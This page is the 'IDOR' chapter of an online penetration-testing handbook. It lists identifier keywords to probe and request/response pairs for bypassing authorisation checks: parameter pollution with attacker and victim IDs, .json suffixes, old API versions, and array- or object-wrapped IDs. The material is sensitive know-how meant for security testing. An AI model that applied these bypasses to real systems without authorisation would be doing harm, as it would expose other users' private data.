Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By
GitBook
IDOR
Basics
1
Check for valuable words:
2
{regex + perm} id
3
{regex + perm} user
4
{regex + perm} account
5
{regex + perm} number
6
{regex + perm} order
7
{regex + perm} no
8
{regex + perm} doc
9
{regex + perm} key
10
{regex + perm} email
11
{regex + perm} group
12
{regex + perm} profile
13
{regex + perm} edit
Copied!
Bypasses
Add parameters onto the endpoints for example, if there was
1
GET /api_v1/messages --> 401
2
vs
3
GET /api_v1/messages?user_id=victim_uuid --> 200
Copied!
HTTP Parameter pollution
1
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
2
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
3
4
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
Copied!
Add .json to the endpoint, if it is built in Ruby!
1
/user_data/2341 --> 401 Unauthorized
2
/user_data/2341.json --> 200 OK
Copied!
Test on outdated API Versions
1
/v3/users_data/1234 --> 403 Forbidden
2
/v1/users_data/1234 --> 200 OK
Copied!
Wrap the ID with an array.
1
{“id”:111} --> 401 Unauthriozied
2
{“id”:[111]} --> 200 OK
Copied!
Wrap the ID with a JSON object:
1
{“id”:111} --> 401 Unauthriozied
2
3
{“id”:{“id”:111}} --> 200 OK
Copied!
JSON Parameter Pollution:
1
POST /api/get_profile
2
Content-Type: application/json
3
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
Copied!
Previous
CRLF
Next
Web Cache Deception
Last modified
1yr ago
Export as PDF
Copy link
Edit on GitHub
Contents
Basics
Bypasses